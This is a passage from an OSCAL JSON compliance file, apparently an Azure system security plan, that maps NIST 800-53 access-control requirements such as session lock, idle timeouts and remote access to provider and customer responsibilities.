Microsoft users must take explicit action to complete the login sequence."}],"responsibilities":[{"uuid":"a6afcf46-e693-4d31-8d72-e57d5276776a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-055"}],"description":"The customer is responsible for requiring users to acknowledge the system use notification (described in AC-08.a) on customer-deployed resources.","provided-uuid":"70a83291-8d75-4f30-98c1-4175601e1911"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fc43e19d-1810-4f7e-9660-df9bd930ced2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-8_smt.c","by-components":[{"uuid":"913a98a1-3c0e-4a13-9dc3-ac50a7b6f93e","export":{"provided":[{"uuid":"a8823697-d513-44ca-8616-88f866a4dcbf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-056"}],"description":"Azure does not display a warning banner on customer interfaces. 
Based on review of requirements and discussions with Azure environment service owners, this control is not applicable to the customer-facing components of the Azure environment, because Azure is a commercial service; customers are responsible for implementing this control either at the proxy level, at the application/client level, or on the ADFS server that authenticates their users who access the Azure environment."}],"responsibilities":[{"uuid":"183f30a5-4d48-454c-b256-f1077124bb00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-056"}],"description":"The customer is responsible for displaying a system use notification on all publicly accessible customer-deployed resources. The notification will include descriptions (if any) of the monitoring, recording, or auditing that may be configured, and a description of the authorized uses of the system.","provided-uuid":"a8823697-d513-44ca-8616-88f866a4dcbf"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"de74e68c-2473-46c0-a61c-57fc3e01d05c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-10","statements":[{"uuid":"4bf4dccf-4ead-4381-9a13-b9c655b04480","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-10_smt","by-components":[{"uuid":"e04791d0-636e-496e-b8ed-9d6bbf010bc4","export":{"provided":[{"uuid":"11f4c8ea-6ca6-43ef-a2bc-2bf411a5f6c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-057"}],"description":"Servers\n\nAzure does not currently limit the number of concurrent sessions to production operating systems. However, users can only log in via Remote Desktop Protocol (RDP) once with their credentials. This limits sessions to one session per host, per user. Additionally, the following compensating access control measures are in place: multifactor authentication is required for all access to Azure systems by Azure personnel; account lockout is enforced for invalid login attempts at the smart card level; and access to administrative interfaces is limited to approved access through role-based access control, ensuring that the risk of exploitation by anyone other than specifically designated personnel is low to non-existent. Conversely, prohibiting concurrent sessions would hinder Azure administration and maintenance. Azure requires specialized, non-public software tools and utilities. These create dedicated sessions directly associated with the tool. 
Trouble investigation, such as running diagnostics, requires multiple instances of these tools, often for extended periods.\n\nNetwork Devices\n\nAccessing network devices in the Azure environment requires users to establish a connection to the Azure Network Hop Boxes or to connect to the VPN before connecting to the Azure environment. When establishing a connection to a network device, a user must authenticate with a physical Azure-issued smart card before establishing a session to an Azure domain server. The multifactor authentication provided by the physical smart card and PIN combination requirement provides additional security when access to network devices is attempted. Concurrent session limits for network devices are enforced at the Azure Network Hop Boxes or the VPN rather than at the individual device layer.\n\nSoftware\n\nService team web applications enforce a limit of one session per browser cookie for all customer user sessions."}],"responsibilities":[{"uuid":"cc48d8fe-bea8-43e6-98b1-257f810c6061","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-057"}],"description":"The customer is responsible for defining and enforcing the limit of concurrent sessions for each customer-controlled account and/or account type.","provided-uuid":"11f4c8ea-6ca6-43ef-a2bc-2bf411a5f6c0"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"71624a75-54c4-4a9c-993e-386b8ad54586","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-11","statements":[{"uuid":"8f59c151-01fd-4729-b244-ce0744040ace","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-058"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-11_smt.a","by-components":[{"uuid":"1a2d6c81-d0e1-44f1-8505-eb87b737e9ac","export":{"provided":[{"uuid":"5e534991-c905-49e9-9524-8cc2510649a2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-058"}],"description":"Core Services Engineering and Operations (CSEO) is responsible for corporate domain settings that enforce a session lock of at most fifteen (15) minutes on Corporate Network (CorpNet) workstations. Secure Admin Workstations (SAWs) have session lock settings of ten (10) minutes. Access to Azure is only possible from Core Services Engineering and Operations (CSEO)-issued SAWs. All access requires the user to utilize a SAW, unless there is a Break-Glass scenario, in which case the CorpNet workstation is used. In addition to the SAW or CorpNet workstations, a Pulse Secure VPN connection is used to access production assets. 
The Pulse Secure VPN is configured to initiate a session lock after 60 minutes of inactivity."}],"responsibilities":[{"uuid":"3b881c91-35d2-464d-8578-e7374fa29eee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-058"}],"description":"The customer is responsible for preventing further access to the system by initiating a device lock after an organization-defined time period of inactivity or requiring the user to initiate a device lock before leaving the system unattended.","provided-uuid":"5e534991-c905-49e9-9524-8cc2510649a2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"364e3aa0-caad-498d-a77e-0440e3cb3436","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-059"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-11_smt.b","by-components":[{"uuid":"56f551ed-09ce-4e2d-bcc6-d0307eb04195","export":{"provided":[{"uuid":"c9c66d96-334e-4e99-ae40-eb2092ae2100","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-059"}],"description":"The only way for the user to end the session lock is by reestablishing access using their credentials on their CorpNet workstation or SAW and the Pulse Secure VPN."}],"responsibilities":[{"uuid":"ca730148-2d7f-4313-95b3-a39b49d07e0a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-059"}],"description":"The customer is responsible for retaining the device lock until the user reestablishes access using established identification and authentication procedures on customer-deployed 
resources.","provided-uuid":"c9c66d96-334e-4e99-ae40-eb2092ae2100"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bd360a16-0795-4835-98d5-1f559744d169","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-11.1","statements":[{"uuid":"db934de6-1549-42ed-aa52-4aa315f15cd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-060"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-11.1_smt","by-components":[{"uuid":"c6cf711d-3056-4e2e-8100-40e316bb787e","export":{"provided":[{"uuid":"e48c61ca-6591-44c8-a635-07c766cdc33c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-060"}],"description":"Azure components rely on the Microsoft CorpNet AD session to perform lock functionality and display a blank login screen when a session is locked."}],"responsibilities":[{"uuid":"cdebf2b7-79d8-434b-947e-88154b5bdda7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-060"}],"description":"The customer is responsible for concealing previously visible information when a session lock is initiated on customer-deployed resources.","provided-uuid":"e48c61ca-6591-44c8-a635-07c766cdc33c"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"912721ef-52d3-4c81-adb4-353d2a3badaa","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-12","statements":[{"uuid":"88793bd1-098d-43af-99df-262b9b9f565d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-12_smt","by-components":[{"uuid":"07283d1f-601d-492a-848b-d314e0dc4359","export":{"provided":[{"uuid":"9d15e47b-7697-4c4e-9303-3978d4c50643","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-061"}],"description":"Azure automatically terminates Microsoft user sessions upon receiving a logout request from the user. Secure Admin Workstations (SAWs) require reauthentication after at most ten (10) minutes of user inactivity.\n\nVPN\n\nThe SAW VPN terminates inactive sessions after three hundred sixty (360) minutes of inactivity, and the non-SAW VPN terminates inactive sessions after sixty (60) minutes of inactivity.\n\nServers\n\nRDP and SSH idle timeouts inherit the settings of the target server. Azure servers are configured to terminate idle sessions after fifteen (15) minutes of inactivity.\n\nNetwork Devices\n\nThe SSH idle timeout inherits the settings of the target network device. 
Azure network devices are configured to terminate inactive sessions after sixty (60) minutes."}],"responsibilities":[{"uuid":"159e8ce6-104b-40d9-aa02-e3d2b4d8fb03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-061"}],"description":"The customer is responsible for defining and enforcing events or conditions requiring the termination of a user session on customer-deployed resources.","provided-uuid":"9d15e47b-7697-4c4e-9303-3978d4c50643"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"85cf5a5d-7511-4757-830e-5774131c77d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-14","statements":[{"uuid":"a69d51e4-0fb8-4d96-be13-27d730fe0d89","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-14_smt.a","by-components":[{"uuid":"6e929753-9f6f-476a-9450-07bc0e131ccc","export":{"provided":[{"uuid":"15e63a2f-b2f5-42f6-8730-9dd7ed3816bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-062"}],"description":"The only actions permitted by Azure to be performed without identification and authentication are accessing the public Feature Descriptions, Developer Documents, Legal, Privacy Statement, Help, and Language Preference options on the customer-facing welcome page. 
On the welcome page the user enters his or her email address, at which point Active Directory Federation Services (ADFS) refers the user back to the customer-controlled federated authentication portal.\n\nService teams also make aspects of their services consumable as needed. For instance, Azure Active Directory (AAD) DNS responds to unauthenticated DNS queries by design, as this is required to be compliant with the DNS specification and to ensure customers can successfully resolve AAD URLs."}],"responsibilities":[{"uuid":"7b453ce3-7bc1-4824-9345-b10b14e7bfca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-062"}],"description":"The customer is responsible for identifying actions that can be performed on the customer-deployed resources without identification or authentication (e.g., viewing a publicly accessible web page).","provided-uuid":"15e63a2f-b2f5-42f6-8730-9dd7ed3816bd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f6d3f557-0035-4245-82dc-573f499db23d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-063"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-14_smt.b","by-components":[{"uuid":"84632808-6abc-46c0-8e73-2b2bb0b71a9c","export":{"provided":[{"uuid":"4f0e0bd0-4e55-4896-9a0e-719b2c3eb760","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-063"}],"description":"The information in the Feature Descriptions, Developer Documents, Legal, Privacy Statement, Help, and Language Preference is either legally required or foundational to an 
internet-facing service, and none of it impacts the security of the system if disclosed. Service teams also make aspects of their services consumable as needed. For instance, Azure Active Directory (AAD) DNS responds to unauthenticated DNS queries by design, as this is required to be compliant with the DNS specification and to ensure customers can successfully resolve AAD URLs."}],"responsibilities":[{"uuid":"f73e6198-6f27-4241-8a38-821488f1e800","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-063"}],"description":"The customer is responsible for providing documentation for user actions not requiring identification or authentication on customer-deployed resources.","provided-uuid":"4f0e0bd0-4e55-4896-9a0e-719b2c3eb760"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e7140000-2683-4c44-b488-84eec73549e7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17","statements":[{"uuid":"d78a8a7f-d59b-498a-a910-dafd74b08003","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-064"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17_smt.a","by-components":[{"uuid":"01387e4f-327a-44ff-8faa-5c7f4a1ff5cc","export":{"provided":[{"uuid":"d78bf702-222a-40b5-9704-9584da2a44b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-064"}],"description":"There are several authentication steps required to access Azure resources remotely. 
Authorized Microsoft personnel utilize Microsoft-issued Secure Admin Workstations (SAWs) and connect remotely to Azure from the Corporate Network (CorpNet). Microsoft internal user connections originate in CorpNet passing via the CorpNet Firewall through Azure-managed load balancers. Users are identified by a unique Active Directory (AD) identifier on CorpNet with multifactor authentication. If a user is not at a physical Microsoft location, remote access to CorpNet also requires corporate MSFTVPN connectivity using Microsoft-issued smart card certificates and PIN-based authentication. Once authenticated through CorpNet, Microsoft personnel access the Azure environment in one of two ways - via the VPN or via the Jumpbox, Debug Server, and Network Hop Box infrastructure. The VPN provides direct access via RDP and SSH to the assets. Alternatively, personnel can log into Jumpboxes and Debug servers for server access and Network Hop Boxes for network device access. Once through the VPN, Jumpbox, Debug Server, or Network Hop Box, the user can access Azure assets. Jumpboxes and Debug Servers Jumpboxes are servers in Azure datacenters that provide remote access paths into the Azure production environment. Azure users log into these Jumpboxes to perform routine maintenance, emergency repairs, diagnosis, and administration of Azure production environment. Access to the Jumpboxes via RDP is restricted to CorpNet and requires multifactor authentication using the user's AD credential and a smart card. Access to Jumpboxes is restricted to designated OneIdentity security groups. Similar to Jumpboxes, Debug servers are non-domain-joined servers located entirely within the Azure production environment. users connect to Debug servers via RDP using specific, CorpNet-exposed endpoints before accessing Azure assets. Access to Debug servers is similarly restricted to designated OneIdentity security groups. 
Network Hop Boxes: Network Hop Boxes are the network device equivalent of the server Jumpboxes, providing access to Azure network devices. VPN: Personnel use the following methods via SSL VPN to access Azure production assets: * Public Key Infrastructure (PKI) to secure communication between the certificate server and the target asset, with CRL validation of the certificates * Microsoft Entra ID (formerly AAD) multifactor authentication via smart card, from the identity server to the target asset"}],"responsibilities":[{"uuid":"81d26126-ea46-4550-9b44-2b54f25870cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-064"}],"description":"The customer is responsible for documenting remote access requirements to customer-deployed resources, including usage restrictions, configuration and connection requirements, and implementation guidance for all remote access types.","provided-uuid":"d78bf702-222a-40b5-9704-9584da2a44b1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8f6bafe1-03c9-4ad0-887d-7605fd63e378","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-065"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17_smt.b","by-components":[{"uuid":"c1cb1657-63b6-4e13-8ad0-2e5be14543cb","export":{"provided":[{"uuid":"30c3e37d-31d8-46f3-80ac-7a2ca413d848","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-065"}],"description":"Azure authorizes remote access for Azure service team users. 
Before service team personnel can connect to Azure remotely, they must first be approved for remote access by an authorized manager. This process is automatically enforced by OneIdentity."}],"responsibilities":[{"uuid":"8359d589-ddb4-4e63-9f87-ddc4d09eaec5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-065"}],"description":"The customer is responsible for authorizing each type of remote access to the system prior to allowing such connections.","provided-uuid":"30c3e37d-31d8-46f3-80ac-7a2ca413d848"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"80ea5baa-6094-460f-820e-cfaabc5d759e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.1","statements":[{"uuid":"86b53517-0f6f-4ecd-b955-666c78b3eb5c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-066"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.1_smt","by-components":[{"uuid":"ac4d3f46-7508-4696-a107-1686e80d9445","export":{"provided":[{"uuid":"e93dd4c2-85b6-4fa2-a202-6a5fe33d9366","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-066"}],"description":"Azure utilizes Azure Security Monitoring (ASM) and SCUBA for monitoring logs for unauthorized remote access to the information system. ASM and SCUBA look for indicators of attempted security attacks and indicators of compromised systems. 
Any unauthorized or otherwise unusual remote access to the information system automatically generates an Incident Management (IcM) ticket to the service owners or the Security Response Team for investigation. Geneva Monitoring is configured to collect remote access events from the Windows Event Log. These events are uploaded to the security information and event management tools, where the Security Response Team processes them to establish the range of normal system usage and to examine deviations from that range. Unusual activity is flagged for further review."}],"responsibilities":[{"uuid":"326cd81f-d130-4ffc-8170-e5a81016e564","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-066"}],"description":"The customer is responsible for monitoring and controlling remote access methods for customer-deployed resources.","provided-uuid":"e93dd4c2-85b6-4fa2-a202-6a5fe33d9366"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"26f5f968-a7cc-48b6-8494-7bc02b12f753","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.2","statements":[{"uuid":"d1bfb28a-a39f-4923-aa3d-a020822266cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-067"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.2_smt","by-components":[{"uuid":"38466bef-fab8-4592-af62-6a8697b878d8","export":{"provided":[{"uuid":"17ed834d-771c-45a5-95c1-2cfae5bffedb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-067"}],"description":"For all asset types, Azure uses cryptographic controls to protect the confidentiality, authenticity, and integrity of sensitive data in transit and at rest. To ensure confidentiality, Azure uses both symmetric and asymmetric keys to encrypt sensitive data and prevent access by unauthorized parties. For example, secrets such as the Storage Key are encrypted using the receiving component's public key prior to transmission. As part of the component's deployment, the private key is installed into the runtime environment using the Azure Certificate Store (WACS) functionality provided by the Fabric. The component uses the private key installed in the WACS to decrypt the secret. To ensure integrity, Azure uses asymmetric keys to protect sensitive data against unauthorized modification during transmission between components. 
For example, a component might generate a file, compute a cryptographic checksum over the file's contents, and then sign that checksum with its private key. On subsequent access to the file, the component first validates that the contents have not been modified by recomputing the checksum over the current contents and verifying the signature, which requires only the public key. Azure uses FIPS 140-2 validated cryptography for remote access. Azure Remote Desktop Protocol (RDP) and SSL VPN services are configured to use FIPS 140-2 validated TLS 1.2 encryption, and encryption is required for all connections. The PKI certificates used on the internal RD gateways and the SSL certificates used by the access solutions are obtained through the Azure PKI."}],"responsibilities":[{"uuid":"bb54aed9-abec-46b3-afe4-afa5f6676082","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-067"}],"description":"The customer is responsible for implementing cryptographic mechanisms (e.g., TLS) to protect remote access sessions to customer-deployed resources.","provided-uuid":"17ed834d-771c-45a5-95c1-2cfae5bffedb"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"726d8749-5964-4ab1-80b8-4a8c46793f95","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.3","statements":[{"uuid":"b53c1f85-b546-4fb7-abfc-4aabfa77f345","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-068"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.3_smt","by-components":[{"uuid":"4ea9a175-0816-4c7d-99fa-36ef757e8b33","export":{"provided":[{"uuid":"788167f9-18ea-4717-9639-0a5e27438ba4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-068"}],"description":"Azure leverages AD to control access to Azure assets. 
Azure is protected using Microsoft-controlled AD security groups and requires multifactor authentication via smart cards at security boundaries, including at the VPN, Jumpboxes, Debug Servers, and Network Hop Boxes."}],"responsibilities":[{"uuid":"e9d6f9d3-4fd6-4cba-91d4-bac6433fd452","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-068"}],"description":"The customer is responsible for routing remote access connections to customer-deployed resources through managed network access control points.","provided-uuid":"788167f9-18ea-4717-9639-0a5e27438ba4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0424770f-e4e5-4b52-bc16-75c546c6a28f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-17.4","statements":[{"uuid":"fe4e545f-1b9e-4639-a746-6560c2d5118f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-069"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.4_smt.a","by-components":[{"uuid":"fd8190fe-5a12-4a7c-978d-575eefe385da","export":{"provided":[{"uuid":"6e56ae10-c217-407b-8ba8-fa3c6d81940f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-069"}],"description":"Azure authorizes the execution of commands only for users with elevated access who have been approved by an authorized manager and have a compelling operational need for access to an asset. 
Because Azure support personnel do not have physical access to the datacenters, there is a business requirement for those personnel to have remote access to conduct their work on the geographically dispersed Azure datacenter assets."}],"responsibilities":[{"uuid":"1b8ad83c-aa5b-4785-b5d3-aacc1dae676a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-069"}],"description":"The customer is responsible for authorizing privileged commands and access to security-relevant information via remote access for customer-deployed resources.","provided-uuid":"6e56ae10-c217-407b-8ba8-fa3c6d81940f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c0c1ad75-3f98-4b65-a9e5-7d0589c11af9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-070"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-17.4_smt.b","by-components":[{"uuid":"76cedc9f-6fce-4d7b-87b9-b502ed5c7575","export":{"provided":[{"uuid":"b6253eab-758b-4bd8-b1b7-0380bf5f7f51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-070"}],"description":"Because Azure support personnel do not have physical access to the datacenters, there is a business requirement for those personnel to have remote access to conduct their work on the geographically dispersed Azure datacenter assets."}],"responsibilities":[{"uuid":"01df3c73-a81d-4c2c-8f57-1ad7f653b004","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-070"}],"description":"The customer is responsible for documenting the rationale for executing privileged commands via 
